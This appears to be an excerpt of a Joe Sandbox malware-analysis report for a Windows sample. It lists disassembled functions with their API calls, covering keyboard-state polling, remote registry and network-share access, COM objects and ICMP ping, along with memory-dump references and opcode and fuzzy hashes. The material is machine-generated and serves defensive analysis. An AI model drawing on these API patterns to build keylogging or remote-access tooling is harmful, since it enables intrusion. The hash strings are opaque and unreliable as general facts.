                                                                                      • Opcode Fuzzy Hash: 345eae9145b27f7177b5678c9ae203741df98884f4669f71539e27a0cb0fedd2
                                                                                      • Instruction Fuzzy Hash: 4751FCB1A00609AFDB18CF68DD89BAEBBB5FB48304F148129F919E7290D7709E04CB50
                                                                                      Function 00C28BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C28BE8,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28FC5
                                                                                      • DestroyWindow.USER32(?), ref: 00C28C81
                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28D1B
                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00C66973
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C669A1
                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C669B8
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C28BBA,00000000), ref: 00C669D4
                                                                                      • DeleteObject.GDI32(00000000), ref: 00C669E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 641708696-0
                                                                                      • Opcode ID: 878d2236889c28def3ee0062efcce7198f7d29a820c5d6a395cb46c4ec2c65c8
                                                                                      • Instruction ID: e275035b53e19a08f8c6f69369cb69bdfdb41530ead4e55965608bf09897142d
                                                                                      • Opcode Fuzzy Hash: 878d2236889c28def3ee0062efcce7198f7d29a820c5d6a395cb46c4ec2c65c8
                                                                                      • Instruction Fuzzy Hash: 1F61DE31102660DFCB319F15EA88B2DB7F1FB41316F18451CE4529B9A1CB35AEA8DF90
                                                                                      Function 00C29838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29944: GetWindowLongW.USER32(?,000000EB), ref: 00C29952
                                                                                      • GetSysColor.USER32(0000000F), ref: 00C29862
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ColorLongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 259745315-0
                                                                                      • Opcode ID: 74e8f57b13ea6391be7c2063f9e78262124b49dcac3a33a3daa460d5b5abd0eb
                                                                                      • Instruction ID: c4b058898274c53da6d7692891be58e32671e8e4c34b0520e5c188438fd015d9
                                                                                      • Opcode Fuzzy Hash: 74e8f57b13ea6391be7c2063f9e78262124b49dcac3a33a3daa460d5b5abd0eb
                                                                                      • Instruction Fuzzy Hash: 42418031504650AFDB249F38AC88BBD3BA5EB17334F184655FAB68B2E1D7319D42DB10
                                                                                      Function 00C796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00C5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C79717
                                                                                      • LoadStringW.USER32(00000000,?,00C5F7F8,00000001), ref: 00C79720
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C79742
                                                                                      • LoadStringW.USER32(00000000,?,00C5F7F8,00000001), ref: 00C79745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C79866
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 747408836-2268648507
                                                                                      • Opcode ID: ff779653beb36c98f9d5c8809b20bc9437a75815ec8feaba4c82d4392a2f6ee5
                                                                                      • Instruction ID: 5df18d39f75666573171133f81256eeee682000752cd680f28badc681bb8546d
                                                                                      • Opcode Fuzzy Hash: ff779653beb36c98f9d5c8809b20bc9437a75815ec8feaba4c82d4392a2f6ee5
                                                                                      • Instruction Fuzzy Hash: BA415371800109AADB04EBD0CD96EEE7778EF56344F504025F605720A1EB356F89EB61
                                                                                      Function 00C706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C707A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C707BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C707DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C70804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C7082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C70837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7083C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 323675364-22481851
                                                                                      • Opcode ID: b94a83fd571a687d4e8da71ac219e29798f64014874275ca99f4ccdb46c5273e
                                                                                      • Instruction ID: 49098b4d2aa2fddd8ca0137db67d7b47b794ac9d87ad3d316560e9afd4556b4c
                                                                                      • Opcode Fuzzy Hash: b94a83fd571a687d4e8da71ac219e29798f64014874275ca99f4ccdb46c5273e
                                                                                      • Instruction Fuzzy Hash: 65413872C10228EBDF15EBA4DC95DEDB778FF05354F14412AE915A31A0EB30AE45EBA0
                                                                                      Function 00C93C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C93C5C
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C93C8A
                                                                                      • CoUninitialize.OLE32 ref: 00C93C94
                                                                                      • _wcslen.LIBCMT ref: 00C93D2D
                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00C93DB1
                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C93ED5
                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C93F0E
                                                                                      • CoGetObject.OLE32(?,00000000,00CAFB98,?), ref: 00C93F2D
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C93F40
                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C93FC4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C93FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 429561992-0
                                                                                      • Opcode ID: 01f840746c1dbae1b0c6bc7b8ad4e9145ecd7a194db7e422ca5fcded27130512
                                                                                      • Instruction ID: 72d81d80778eb961253ffd01371ee3c4760cf889bb47a747c3a6247f8db6d95b
                                                                                      • Opcode Fuzzy Hash: 01f840746c1dbae1b0c6bc7b8ad4e9145ecd7a194db7e422ca5fcded27130512
                                                                                      • Instruction Fuzzy Hash: 02C146716083459FDB00DF68C88892BB7E9FF89748F10495DF99A9B250DB30EE45CB52
                                                                                      Function 00C87A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C87AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C87B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00C87BA3
                                                                                      • CoCreateInstance.OLE32(00CAFD08,00000000,00000001,00CD6E6C,?), ref: 00C87BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C87C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00C87CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00C87D57
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C87D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C87D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C87DD6
                                                                                      • CoUninitialize.OLE32 ref: 00C87DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      • Opcode ID: e362f09e6d327f054f5091254d3536a3ad854bc4d10f2fa6a25a0ad3824de1e2
                                                                                      • Instruction ID: 829813c51877d6e04293407057d96a755dfbbd91e56fec1fa819b45cb40fd5b0
                                                                                      • Opcode Fuzzy Hash: e362f09e6d327f054f5091254d3536a3ad854bc4d10f2fa6a25a0ad3824de1e2
                                                                                      • Instruction Fuzzy Hash: EBC11C75A04109AFCB14DF64C888DAEBBF9FF49308B148599F8199B361D730EE81DB94
                                                                                      Function 00CA541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CA5504
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA5515
                                                                                      • CharNextW.USER32(00000158), ref: 00CA5544
                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CA5585
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CA559B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA55AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 1350042424-0
                                                                                      • Opcode ID: a350eff7a0b8690eea8a47f783445c3ca02c8bf74f50abff32c2d342338b1e3f
                                                                                      • Instruction ID: 98758c65d8e06e5ad5483114f2a9b277d7ca06fc5aa90e10e1f631f99587f384
                                                                                      • Opcode Fuzzy Hash: a350eff7a0b8690eea8a47f783445c3ca02c8bf74f50abff32c2d342338b1e3f
                                                                                      • Instruction Fuzzy Hash: A461727190060AEBDF10CFA5CC84AFE7BB9EB0B728F148145F9259B290D7748A81DB60
                                                                                      Function 00C6FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C6FAAF
                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00C6FB08
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C6FB1A
                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C6FB3A
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C6FB8D
                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C6FBA1
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C6FBB6
                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00C6FBC3
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C6FBCC
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C6FBDE
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C6FBE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                      • String ID:
                                                                                      • API String ID: 2706829360-0
                                                                                      • Opcode ID: 550fc13d046008b807ca374c59f412979889887474f0c90880871fc3192f7d67
                                                                                      • Instruction ID: 7b0361a5a22df591040135abe1e9eac198323296b03818636a876129ef69d2b5
                                                                                      • Opcode Fuzzy Hash: 550fc13d046008b807ca374c59f412979889887474f0c90880871fc3192f7d67
                                                                                      • Instruction Fuzzy Hash: 04414175A002199FCB10DFA8D898AFDBBB9FF49344F008069E955A7261CB30A946DF94
                                                                                      Function 00C79C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 00C79CA1
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00C79D22
                                                                                      • GetKeyState.USER32(000000A0), ref: 00C79D3D
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00C79D57
                                                                                      • GetKeyState.USER32(000000A1), ref: 00C79D6C
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00C79D84
                                                                                      • GetKeyState.USER32(00000011), ref: 00C79D96
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00C79DAE
                                                                                      • GetKeyState.USER32(00000012), ref: 00C79DC0
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00C79DD8
                                                                                      • GetKeyState.USER32(0000005B), ref: 00C79DEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: 6e77883cd58d345d4cc3a348f287678ce68dea2ee526c5ca91f61e308404e63d
                                                                                      • Instruction ID: 7fa7026c67827200eb6f8cb52d1aac8a917bba2afda696509dd9d41860039d10
                                                                                      • Opcode Fuzzy Hash: 6e77883cd58d345d4cc3a348f287678ce68dea2ee526c5ca91f61e308404e63d
                                                                                      • Instruction Fuzzy Hash: 7641A834504BC96DFF31966488443B5BEA1EF22344F08C05ADADA575C2EBB59BC8C792
                                                                                      Function 00C9055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00C905BC
                                                                                      • inet_addr.WSOCK32(?), ref: 00C9061C
                                                                                      • gethostbyname.WSOCK32(?), ref: 00C90628
                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00C90636
                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C906C6
                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C906E5
                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00C907B9
                                                                                      • WSACleanup.WSOCK32 ref: 00C907BF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                      • String ID: Ping
                                                                                      • API String ID: 1028309954-2246546115
                                                                                      • Opcode ID: 59d30ca403f1a4683fe573fbf684d02212b0457bbbaaf194a9a8de72de8a4b53
                                                                                      • Instruction ID: 659d987caf52861a2c086655fb19326dd19638c6189db6aef74a8f9165639b7e
                                                                                      • Opcode Fuzzy Hash: 59d30ca403f1a4683fe573fbf684d02212b0457bbbaaf194a9a8de72de8a4b53
                                                                                      • Instruction Fuzzy Hash: D5917C35604201AFDB20DF55D888F1ABBE0AF45328F2585A9F4698B6A2C730ED85CF91
                                                                                      Function 00C98CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                      • API String ID: 707087890-567219261
                                                                                      • Opcode ID: 4c4395deb71ac892af65ef6e9e1f1b88efa659c3e3243d18fd6a1095db3f4d37
                                                                                      • Instruction ID: fcc99781b443433e0e62888ef2407a8ea24deaaa3865e157a68ed44b4b619980
                                                                                      • Opcode Fuzzy Hash: 4c4395deb71ac892af65ef6e9e1f1b88efa659c3e3243d18fd6a1095db3f4d37
                                                                                      • Instruction Fuzzy Hash: 2751C136A001169BCF14DF68C8549BEB3A5BF66720B204229F526E73C4EB35DE48D790
                                                                                      Function 00C9372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32 ref: 00C93774
                                                                                      • CoUninitialize.OLE32 ref: 00C9377F
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00CAFB78,?), ref: 00C937D9
                                                                                      • IIDFromString.OLE32(?,?), ref: 00C9384C
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C938E4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C93936
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                      • API String ID: 636576611-1287834457
                                                                                      • Opcode ID: c1c503106544e849bb3fe7b36f6343b10728dede8fbd7ecbe95a273d44eec470
                                                                                      • Instruction ID: 73cd9988ca55e7a141b21d747548fa6ce3e152b506b77e1cf6f7bb12eae4e49e
                                                                                      • Opcode Fuzzy Hash: c1c503106544e849bb3fe7b36f6343b10728dede8fbd7ecbe95a273d44eec470
                                                                                      • Instruction Fuzzy Hash: 1661CE70208341AFDB10DF54C88CB6ABBE8EF49714F10091AF9959B291D770EE48DB96
                                                                                      Function 00C83388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C833CF
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C833F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
